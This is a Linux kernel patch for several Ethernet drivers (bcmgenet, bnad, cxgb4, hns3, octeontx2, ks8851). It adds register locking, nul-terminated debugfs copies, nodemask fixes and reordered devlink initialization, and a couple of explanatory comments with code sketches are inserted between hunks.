+-	if (reg & CMD_SW_RESET)
++	if (reg & CMD_SW_RESET) {
++		spin_unlock_bh(&priv->reg_lock);
+ 		return;
++	}
+ 	if (enable)
+ 		reg |= mask;
+ 	else
+ 		reg &= ~mask;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 
+ 	/* UniMAC stops on a packet boundary, wait for a full-size packet
+ 	 * to be processed
+@@ -2491,8 +2495,10 @@ static void reset_umac(struct bcmgenet_priv *priv)
+ 	udelay(10);
+ 
+ 	/* issue soft reset and disable MAC while updating its registers */
++	spin_lock_bh(&priv->reg_lock);
+ 	bcmgenet_umac_writel(priv, CMD_SW_RESET, UMAC_CMD);
+ 	udelay(2);
++	spin_unlock_bh(&priv->reg_lock);
+ }
+ 
+ static void bcmgenet_intr_disable(struct bcmgenet_priv *priv)
+@@ -3298,7 +3304,7 @@ static void bcmgenet_get_hw_addr(struct bcmgenet_priv *priv,
+ }
+ 
+ /* Returns a reusable dma control register value */
+-static u32 bcmgenet_dma_disable(struct bcmgenet_priv *priv)
++static u32 bcmgenet_dma_disable(struct bcmgenet_priv *priv, bool flush_rx)
+ {
+ 	unsigned int i;
+ 	u32 reg;
+@@ -3323,6 +3329,14 @@ static u32 bcmgenet_dma_disable(struct bcmgenet_priv *priv)
+ 	udelay(10);
+ 	bcmgenet_umac_writel(priv, 0, UMAC_TX_FLUSH);
+ 
++	if (flush_rx) {
++		reg = bcmgenet_rbuf_ctrl_get(priv);
++		bcmgenet_rbuf_ctrl_set(priv, reg | BIT(0));
++		udelay(10);
++		bcmgenet_rbuf_ctrl_set(priv, reg);
++		udelay(10);
++	}
++
+ 	return dma_ctrl;
+ }
+ 
+@@ -3344,7 +3358,9 @@ static void bcmgenet_netif_start(struct net_device *dev)
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 
+ 	/* Start the network engine */
++	netif_addr_lock_bh(dev);
+ 	bcmgenet_set_rx_mode(dev);
++	netif_addr_unlock_bh(dev);
+ 	bcmgenet_enable_rx_napi(priv);
+ 
+ 	umac_enable_set(priv, CMD_TX_EN | CMD_RX_EN, true);
+@@ -3386,8 +3402,8 @@ static int bcmgenet_open(struct net_device *dev)
+ 
+ 	bcmgenet_set_hw_addr(priv, dev->dev_addr);
+ 
+-	/* Disable RX/TX DMA and flush TX queues */
+-	dma_ctrl = bcmgenet_dma_disable(priv);
++	/* Disable RX/TX DMA and flush TX and RX queues */
++	dma_ctrl = bcmgenet_dma_disable(priv, true);
+ 
+ 	/* Reinitialize TDMA and RDMA and SW housekeeping */
+ 	ret = bcmgenet_init_dma(priv);
+@@ -3605,16 +3621,19 @@ static void bcmgenet_set_rx_mode(struct net_device *dev)
+ 	 * 3. The number of filters needed exceeds the number filters
+ 	 *    supported by the hardware.
+ 	*/
++	spin_lock(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	if ((dev->flags & (IFF_PROMISC | IFF_ALLMULTI)) ||
+ 	    (nfilter > MAX_MDF_FILTER)) {
+ 		reg |= CMD_PROMISC;
+ 		bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++		spin_unlock(&priv->reg_lock);
+ 		bcmgenet_umac_writel(priv, 0, UMAC_MDF_CTRL);
+ 		return;
+ 	} else {
+ 		reg &= ~CMD_PROMISC;
+ 		bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++		spin_unlock(&priv->reg_lock);
+ 	}
+ 
+ 	/* update MDF filter */
+@@ -4016,6 +4035,7 @@ static int bcmgenet_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 
++	spin_lock_init(&priv->reg_lock);
+ 	spin_lock_init(&priv->lock);
+ 
+ 	/* Set default pause parameters */
+@@ -4258,7 +4278,7 @@ static int bcmgenet_resume(struct device *d)
+ 			bcmgenet_hfb_create_rxnfc_filter(priv, rule);
+ 
+ 	/* Disable RX/TX DMA and flush TX queues */
+-	dma_ctrl = bcmgenet_dma_disable(priv);
++	dma_ctrl = bcmgenet_dma_disable(priv, false);
+ 
+ 	/* Reinitialize TDMA and RDMA and SW housekeeping */
+ 	ret = bcmgenet_init_dma(priv);
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.h b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+index 1985c0ec4da2a..28e2c94ef835c 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.h
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- * Copyright (c) 2014-2020 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #ifndef __BCMGENET_H__
+@@ -573,6 +573,8 @@ struct bcmgenet_rxnfc_rule {
+ /* device context */
+ struct bcmgenet_priv {
+ 	void __iomem *base;
++	/* reg_lock: lock to serialize access to shared registers */
++	spinlock_t reg_lock;
+ 	enum bcmgenet_version version;
+ 	struct net_device *dev;
+ 
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c b/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c
+index f55d9d9c01a85..56781e7214978 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet_wol.c
+@@ -2,7 +2,7 @@
+ /*
+  * Broadcom GENET (Gigabit Ethernet) Wake-on-LAN support
+  *
+- * Copyright (c) 2014-2020 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #define pr_fmt(fmt)				"bcmgenet_wol: " fmt
+@@ -133,6 +133,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	}
+ 
+ 	/* Can't suspend with WoL if MAC is still in reset */
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	if (reg & CMD_SW_RESET)
+ 		reg &= ~CMD_SW_RESET;
+@@ -140,6 +141,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	/* disable RX */
+ 	reg &= ~CMD_RX_EN;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 	mdelay(10);
+ 
+ 	if (priv->wolopts & (WAKE_MAGIC | WAKE_MAGICSECURE)) {
+@@ -185,6 +187,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	}
+ 
+ 	/* Enable CRC forward */
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	priv->crc_fwd_en = 1;
+ 	reg |= CMD_CRC_FWD;
+@@ -192,6 +195,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ 	/* Receiver must be enabled for WOL MP detection */
+ 	reg |= CMD_RX_EN;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 
+ 	reg = UMAC_IRQ_MPD_R;
+ 	if (hfb_enable)
+@@ -238,7 +242,9 @@ void bcmgenet_wol_power_up_cfg(struct bcmgenet_priv *priv,
+ 	}
+ 
+ 	/* Disable CRC Forward */
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	reg &= ~CMD_CRC_FWD;
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ }
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index 1779ee524dac7..f21f2aaa6fd91 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -2,7 +2,7 @@
+ /*
+  * Broadcom GENET MDIO routines
+  *
+- * Copyright (c) 2014-2017 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #include <linux/acpi.h>
+@@ -72,10 +72,10 @@ static void bcmgenet_mac_config(struct net_device *dev)
+ 	 * Receive clock is provided by the PHY.
+ 	 */
+ 	reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
+-	reg &= ~OOB_DISABLE;
+ 	reg |= RGMII_LINK;
+ 	bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
+ 
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
+ 	reg &= ~((CMD_SPEED_MASK << CMD_SPEED_SHIFT) |
+ 		       CMD_HD_EN |
+@@ -88,6 +88,7 @@ static void bcmgenet_mac_config(struct net_device *dev)
+ 		reg |= CMD_TX_EN | CMD_RX_EN;
+ 	}
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++	spin_unlock_bh(&priv->reg_lock);
+ 
+ 	priv->eee.eee_active = phy_init_eee(phydev, 0) >= 0;
+ 	bcmgenet_eee_enable_set(dev,
+@@ -100,10 +101,18 @@ static void bcmgenet_mac_config(struct net_device *dev)
+  */
+ void bcmgenet_mii_setup(struct net_device *dev)
+ {
++	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 	struct phy_device *phydev = dev->phydev;
++	u32 reg;
+ 
+-	if (phydev->link)
++	if (phydev->link) {
+ 		bcmgenet_mac_config(dev);
++	} else {
++		reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
++		reg &= ~RGMII_LINK;
++		bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
++	}
++
+ 	phy_print_status(phydev);
+ }
+ 
+@@ -264,18 +273,22 @@ int bcmgenet_mii_config(struct net_device *dev, bool init)
+ 			(priv->phy_interface != PHY_INTERFACE_MODE_MOCA);
+ 
+ 	/* This is an external PHY (xMII), so we need to enable the RGMII
+-	 * block for the interface to work
++	 * block for the interface to work; unconditionally clear the
++	 * Out-of-band disable since we do not need it.
+ 	 */
++	mutex_lock(&phydev->lock);
++	reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
++	reg &= ~OOB_DISABLE;
+ 	if (priv->ext_phy) {
+-		reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL);
+ 		reg &= ~ID_MODE_DIS;
+ 		reg |= id_mode_dis;
+ 		if (GENET_IS_V1(priv) || GENET_IS_V2(priv) || GENET_IS_V3(priv))
+ 			reg |= RGMII_MODE_EN_V123;
+ 		else
+ 			reg |= RGMII_MODE_EN;
+-		bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
+ 	}
++	bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL);
++	mutex_unlock(&phydev->lock);
+ 
+ 	if (init)
+ 		dev_info(kdev, "configuring instance for %s\n", phy_name);
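All of the bcmgenet hunks above share one shape: UMAC_CMD is touched by the link handler, the WoL paths and set_rx_mode, so every read-modify-write of it now happens under priv->reg_lock. A compact sketch of the pattern, with a stand-in register:

#include <linux/io.h>
#include <linux/spinlock.h>
#include <linux/types.h>

struct demo_priv {
	void __iomem *cmd_reg;
	spinlock_t reg_lock;	/* serializes RMW of cmd_reg */
};

static void demo_update_cmd(struct demo_priv *priv, u32 mask, bool enable)
{
	u32 reg;

	spin_lock_bh(&priv->reg_lock);	/* _bh: some callers run in softirq */
	reg = readl(priv->cmd_reg);
	if (enable)
		reg |= mask;
	else
		reg &= ~mask;
	writel(reg, priv->cmd_reg);
	spin_unlock_bh(&priv->reg_lock);
}

bcmgenet_set_rx_mode() can take the plain spin_lock() variant because netif_addr_lock_bh() has already disabled bottom halves by the time it runs.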
+diff --git a/drivers/net/ethernet/brocade/bna/bnad_debugfs.c b/drivers/net/ethernet/brocade/bna/bnad_debugfs.c
+index 04ad0f2b9677e..777f0d7e48192 100644
+--- a/drivers/net/ethernet/brocade/bna/bnad_debugfs.c
++++ b/drivers/net/ethernet/brocade/bna/bnad_debugfs.c
+@@ -312,7 +312,7 @@ bnad_debugfs_write_regrd(struct file *file, const char __user *buf,
+ 	void *kern_buf;
+ 
+ 	/* Copy the user space buf */
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+@@ -372,7 +372,7 @@ bnad_debugfs_write_regwr(struct file *file, const char __user *buf,
+ 	void *kern_buf;
+ 
+ 	/* Copy the user space buf */
+-	kern_buf = memdup_user(buf, nbytes);
++	kern_buf = memdup_user_nul(buf, nbytes);
+ 	if (IS_ERR(kern_buf))
+ 		return PTR_ERR(kern_buf);
+ 
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c
+index 46809e2d94ee0..4809d9eae6ca5 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/sge.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c
+@@ -2684,12 +2684,12 @@ int cxgb4_selftest_lb_pkt(struct net_device *netdev)
+ 	lb->loopback = 1;
+ 
+ 	q = &adap->sge.ethtxq[pi->first_qset];
+-	__netif_tx_lock(q->txq, smp_processor_id());
++	__netif_tx_lock_bh(q->txq);
+ 
+ 	reclaim_completed_tx(adap, &q->q, -1, true);
+ 	credits = txq_avail(&q->q) - ndesc;
+ 	if (unlikely(credits < 0)) {
+-		__netif_tx_unlock(q->txq);
++		__netif_tx_unlock_bh(q->txq);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -2724,7 +2724,7 @@ int cxgb4_selftest_lb_pkt(struct net_device *netdev)
+ 	init_completion(&lb->completion);
+ 	txq_advance(&q->q, ndesc);
+ 	cxgb4_ring_tx_db(adap, &q->q, ndesc);
+-	__netif_tx_unlock(q->txq);
++	__netif_tx_unlock_bh(q->txq);
+ 
+ 	/* wait for the pkt to return */
+ 	ret = wait_for_completion_timeout(&lb->completion, 10 * HZ);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hnae3.h b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+index c693bb701ba3e..60b8d61af07f9 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hnae3.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hnae3.h
+@@ -873,7 +873,7 @@ struct hnae3_handle {
+ 		struct hnae3_roce_private_info rinfo;
+ 	};
+ 
+-	u32 numa_node_mask;	/* for multi-chip support */
++	nodemask_t numa_node_mask; /* for multi-chip support */
+ 
+ 	enum hnae3_port_base_vlan_state port_base_vlan_state;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 9db363fbc34fd..a2655adc764cd 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -1624,6 +1624,9 @@ static int hclge_configure(struct hclge_dev *hdev)
+ 			cfg.default_speed, ret);
+ 		return ret;
+ 	}
++	hdev->hw.mac.req_speed = hdev->hw.mac.speed;
++	hdev->hw.mac.req_autoneg = AUTONEG_ENABLE;
++	hdev->hw.mac.req_duplex = DUPLEX_FULL;
+ 
+ 	hclge_parse_link_mode(hdev, cfg.speed_ability);
+ 
+@@ -1853,7 +1856,8 @@ static int hclge_vport_setup(struct hclge_vport *vport, u16 num_tqps)
+ 
+ 	nic->pdev = hdev->pdev;
+ 	nic->ae_algo = &ae_algo;
+-	nic->numa_node_mask = hdev->numa_node_mask;
++	bitmap_copy(nic->numa_node_mask.bits, hdev->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 	nic->kinfo.io_base = hdev->hw.hw.io_base;
+ 
+ 	ret = hclge_knic_setup(vport, num_tqps,
+@@ -2545,7 +2549,8 @@ static int hclge_init_roce_base_info(struct hclge_vport *vport)
+ 
+ 	roce->pdev = nic->pdev;
+ 	roce->ae_algo = nic->ae_algo;
+-	roce->numa_node_mask = nic->numa_node_mask;
++	bitmap_copy(roce->numa_node_mask.bits, nic->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 
+ 	return 0;
+ }
+@@ -3429,9 +3434,9 @@ hclge_set_phy_link_ksettings(struct hnae3_handle *handle,
+ 		return ret;
+ 	}
+ 
+-	hdev->hw.mac.autoneg = cmd->base.autoneg;
+-	hdev->hw.mac.speed = cmd->base.speed;
+-	hdev->hw.mac.duplex = cmd->base.duplex;
++	hdev->hw.mac.req_autoneg = cmd->base.autoneg;
++	hdev->hw.mac.req_speed = cmd->base.speed;
++	hdev->hw.mac.req_duplex = cmd->base.duplex;
+ 	linkmode_copy(hdev->hw.mac.advertising, cmd->link_modes.advertising);
+ 
+ 	return 0;
+@@ -3464,9 +3469,9 @@ static int hclge_tp_port_init(struct hclge_dev *hdev)
+ 	if (!hnae3_dev_phy_imp_supported(hdev))
+ 		return 0;
+ 
+-	cmd.base.autoneg = hdev->hw.mac.autoneg;
+-	cmd.base.speed = hdev->hw.mac.speed;
+-	cmd.base.duplex = hdev->hw.mac.duplex;
++	cmd.base.autoneg = hdev->hw.mac.req_autoneg;
++	cmd.base.speed = hdev->hw.mac.req_speed;
++	cmd.base.duplex = hdev->hw.mac.req_duplex;
+ 	linkmode_copy(cmd.link_modes.advertising, hdev->hw.mac.advertising);
+ 
+ 	return hclge_set_phy_link_ksettings(&hdev->vport->nic, &cmd);
+@@ -8046,8 +8051,7 @@ static void hclge_set_timer_task(struct hnae3_handle *handle, bool enable)
+ 		/* Set the DOWN flag here to disable link updating */
+ 		set_bit(HCLGE_STATE_DOWN, &hdev->state);
+ 
+-		/* flush memory to make sure DOWN is seen by service task */
+-		smp_mb__before_atomic();
++		smp_mb__after_atomic(); /* flush memory to make sure DOWN is seen by service task */
+ 		hclge_flush_link_update(hdev);
+ 	}
+ }
+@@ -10000,6 +10004,7 @@ static int hclge_set_vlan_protocol_type(struct hclge_dev *hdev)
+ static int hclge_init_vlan_filter(struct hclge_dev *hdev)
+ {
+ 	struct hclge_vport *vport;
++	bool enable = true;
+ 	int ret;
+ 	int i;
+ 
+@@ -10019,8 +10024,12 @@ static int hclge_init_vlan_filter(struct hclge_dev *hdev)
+ 		vport->cur_vlan_fltr_en = true;
+ 	}
+ 
++	if (test_bit(HNAE3_DEV_SUPPORT_VLAN_FLTR_MDF_B, hdev->ae_dev->caps) &&
++	    !test_bit(HNAE3_DEV_SUPPORT_PORT_VLAN_BYPASS_B, hdev->ae_dev->caps))
++		enable = false;
++
+ 	return hclge_set_vlan_filter_ctrl(hdev, HCLGE_FILTER_TYPE_PORT,
+-					  HCLGE_FILTER_FE_INGRESS, true, 0);
++					  HCLGE_FILTER_FE_INGRESS, enable, 0);
+ }
+ 
+ static int hclge_init_vlan_type(struct hclge_dev *hdev)
+@@ -11600,16 +11609,10 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	if (ret)
+ 		goto out;
+ 
+-	ret = hclge_devlink_init(hdev);
+-	if (ret)
+-		goto err_pci_uninit;
+-
+-	devl_lock(hdev->devlink);
+-
+ 	/* Firmware command queue initialize */
+ 	ret = hclge_comm_cmd_queue_init(hdev->pdev, &hdev->hw.hw);
+ 	if (ret)
+-		goto err_devlink_uninit;
++		goto err_pci_uninit;
+ 
+ 	/* Firmware command initialize */
+ 	ret = hclge_comm_cmd_init(hdev->ae_dev, &hdev->hw.hw, &hdev->fw_version,
+@@ -11737,7 +11740,7 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 
+ 	ret = hclge_update_port_info(hdev);
+ 	if (ret)
+-		goto err_mdiobus_unreg;
++		goto err_ptp_uninit;
+ 
+ 	INIT_KFIFO(hdev->mac_tnl_log);
+ 
+@@ -11772,6 +11775,10 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	/* Enable MISC vector(vector0) */
+ 	hclge_enable_vector(&hdev->misc_vector, true);
+ 
++	ret = hclge_devlink_init(hdev);
++	if (ret)
++		goto err_ptp_uninit;
++
+ 	hclge_state_init(hdev);
+ 	hdev->last_reset_time = jiffies;
+ 
+@@ -11779,10 +11786,10 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 		 HCLGE_DRIVER_NAME);
+ 
+ 	hclge_task_schedule(hdev, round_jiffies_relative(HZ));
+-
+-	devl_unlock(hdev->devlink);
+ 	return 0;
+ 
++err_ptp_uninit:
++	hclge_ptp_uninit(hdev);
+ err_mdiobus_unreg:
+ 	if (hdev->hw.mac.phydev)
+ 		mdiobus_unregister(hdev->hw.mac.mdio_bus);
+@@ -11792,9 +11799,6 @@ static int hclge_init_ae_dev(struct hnae3_ae_dev *ae_dev)
+ 	pci_free_irq_vectors(pdev);
+ err_cmd_uninit:
+ 	hclge_comm_cmd_uninit(hdev->ae_dev, &hdev->hw.hw);
+-err_devlink_uninit:
+-	devl_unlock(hdev->devlink);
+-	hclge_devlink_uninit(hdev);
+ err_pci_uninit:
+ 	pcim_iounmap(pdev, hdev->hw.hw.io_base);
+ 	pci_clear_master(pdev);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+index f6fef790e16c1..fd79bb81b6e07 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+@@ -256,11 +256,14 @@ struct hclge_mac {
+ 	u8 media_type;	/* port media type, e.g. fibre/copper/backplane */
+ 	u8 mac_addr[ETH_ALEN];
+ 	u8 autoneg;
++	u8 req_autoneg;
+ 	u8 duplex;
++	u8 req_duplex;
+ 	u8 support_autoneg;
+ 	u8 speed_type;	/* 0: sfp speed, 1: active speed */
+ 	u8 lane_num;
+ 	u32 speed;
++	u32 req_speed;
+ 	u32 max_speed;
+ 	u32 speed_ability; /* speed ability supported by current media */
+ 	u32 module_type; /* sub media type, e.g. kr/cr/sr/lr */
+@@ -872,7 +875,7 @@ struct hclge_dev {
+ 
+ 	u16 fdir_pf_filter_count; /* Num of guaranteed filters for this PF */
+ 	u16 num_alloc_vport;		/* Num vports this driver supports */
+-	u32 numa_node_mask;
++	nodemask_t numa_node_mask;
+ 	u16 rx_buf_len;
+ 	u16 num_tx_desc;		/* desc num of per tx queue */
+ 	u16 num_rx_desc;		/* desc num of per rx queue */
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+index 04ff9bf121853..877feee53804f 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+@@ -1077,12 +1077,13 @@ static void hclge_mbx_request_handling(struct hclge_mbx_ops_param *param)
+ 
+ 	hdev = param->vport->back;
+ 	cmd_func = hclge_mbx_ops_list[param->req->msg.code];
+-	if (cmd_func)
+-		ret = cmd_func(param);
+-	else
++	if (!cmd_func) {
+ 		dev_err(&hdev->pdev->dev,
+ 			"un-supported mailbox message, code = %u\n",
+ 			param->req->msg.code);
++		return;
++	}
++	ret = cmd_func(param);
+ 
+ 	/* PF driver should not reply IMP */
+ 	if (hnae3_get_bit(param->req->mbx_need_resp, HCLGE_MBX_NEED_RESP_B) &&
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 5a978ea101a90..1f5a27fb309aa 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -464,7 +464,8 @@ static int hclgevf_set_handle_info(struct hclgevf_dev *hdev)
+ 
+ 	nic->ae_algo = &ae_algovf;
+ 	nic->pdev = hdev->pdev;
+-	nic->numa_node_mask = hdev->numa_node_mask;
++	bitmap_copy(nic->numa_node_mask.bits, hdev->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 	nic->flags |= HNAE3_SUPPORT_VF;
+ 	nic->kinfo.io_base = hdev->hw.hw.io_base;
+ 
+@@ -2136,8 +2137,8 @@ static int hclgevf_init_roce_base_info(struct hclgevf_dev *hdev)
+ 
+ 	roce->pdev = nic->pdev;
+ 	roce->ae_algo = nic->ae_algo;
+-	roce->numa_node_mask = nic->numa_node_mask;
+-
++	bitmap_copy(roce->numa_node_mask.bits, nic->numa_node_mask.bits,
++		    MAX_NUMNODES);
+ 	return 0;
+ }
+ 
+@@ -2235,8 +2236,7 @@ static void hclgevf_set_timer_task(struct hnae3_handle *handle, bool enable)
+ 	} else {
+ 		set_bit(HCLGEVF_STATE_DOWN, &hdev->state);
+ 
+-		/* flush memory to make sure DOWN is seen by service task */
+-		smp_mb__before_atomic();
++		smp_mb__after_atomic(); /* flush memory to make sure DOWN is seen by service task */
+ 		hclgevf_flush_link_update(hdev);
+ 	}
+ }
+@@ -2902,10 +2902,6 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = hclgevf_devlink_init(hdev);
+-	if (ret)
+-		goto err_devlink_init;
+-
+ 	ret = hclge_comm_cmd_queue_init(hdev->pdev, &hdev->hw.hw);
+ 	if (ret)
+ 		goto err_cmd_queue_init;
+@@ -2998,6 +2994,10 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ 
+ 	hclgevf_init_rxd_adv_layout(hdev);
+ 
++	ret = hclgevf_devlink_init(hdev);
++	if (ret)
++		goto err_config;
++
+ 	set_bit(HCLGEVF_STATE_SERVICE_INITED, &hdev->state);
+ 
+ 	hdev->last_reset_time = jiffies;
+@@ -3017,8 +3017,6 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ err_cmd_init:
+ 	hclge_comm_cmd_uninit(hdev->ae_dev, &hdev->hw.hw);
+ err_cmd_queue_init:
+-	hclgevf_devlink_uninit(hdev);
+-err_devlink_init:
+ 	hclgevf_pci_uninit(hdev);
+ 	clear_bit(HCLGEVF_STATE_IRQ_INITED, &hdev->state);
+ 	return ret;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+index d65ace07b4569..976414d00e67a 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+@@ -236,7 +236,7 @@ struct hclgevf_dev {
+ 	u16 rss_size_max;	/* HW defined max RSS task queue */
+ 
+ 	u16 num_alloc_vport;	/* num vports this driver supports */
+-	u32 numa_node_mask;
++	nodemask_t numa_node_mask;
+ 	u16 rx_buf_len;
+ 	u16 num_tx_desc;	/* desc num of per tx queue */
+ 	u16 num_rx_desc;	/* desc num of per rx queue */
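Behind the hns3 churn is a plain representation bug: numa_node_mask was a u32, which can only describe NUMA nodes 0-31, while the handle's mask is a real nodemask_t. The copies are now done bit-for-bit. A sketch of the copy, which is all the conversion needs:

#include <linux/bitmap.h>
#include <linux/nodemask.h>

static void demo_copy_numa_mask(nodemask_t *dst, const nodemask_t *src)
{
	/* nodemask_t is a fixed-size bitmap of MAX_NUMNODES bits */
	bitmap_copy(dst->bits, src->bits, MAX_NUMNODES);
}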
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index cc5d342e026c7..a3c1d82032f55 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -999,12 +999,10 @@ static ssize_t rvu_dbg_qsize_write(struct file *filp,
+ 	u16 pcifunc;
+ 	int ret, lf;
+ 
+-	cmd_buf = memdup_user(buffer, count + 1);
++	cmd_buf = memdup_user_nul(buffer, count);
+ 	if (IS_ERR(cmd_buf))
+ 		return -ENOMEM;
+ 
+-	cmd_buf[count] = '\0';
+-
+ 	cmd_buf_tmp = strchr(cmd_buf, '\n');
+ 	if (cmd_buf_tmp) {
+ 		*cmd_buf_tmp = '\0';
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index d4cdf3d4f5525..502518cdb4618 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -234,12 +234,13 @@ static void ks8851_dbg_dumpkkt(struct ks8851_net *ks, u8 *rxpkt)
+ /**
+  * ks8851_rx_pkts - receive packets from the host
+  * @ks: The device information.
++ * @rxq: Queue of packets received in this function.
+  *
+  * This is called from the IRQ work queue when the system detects that there
+  * are packets in the receive queue. Find out how many packets there are and
+  * read them from the FIFO.
+  */
+-static void ks8851_rx_pkts(struct ks8851_net *ks)
++static void ks8851_rx_pkts(struct ks8851_net *ks, struct sk_buff_head *rxq)
+ {
+ 	struct sk_buff *skb;
+ 	unsigned rxfc;
+@@ -299,7 +300,7 @@ static void ks8851_rx_pkts(struct ks8851_net *ks)
+ 					ks8851_dbg_dumpkkt(ks, rxpkt);
+ 
+ 				skb->protocol = eth_type_trans(skb, ks->netdev);
+-				__netif_rx(skb);
++				__skb_queue_tail(rxq, skb);
+ 
+ 				ks->netdev->stats.rx_packets++;
+ 				ks->netdev->stats.rx_bytes += rxlen;
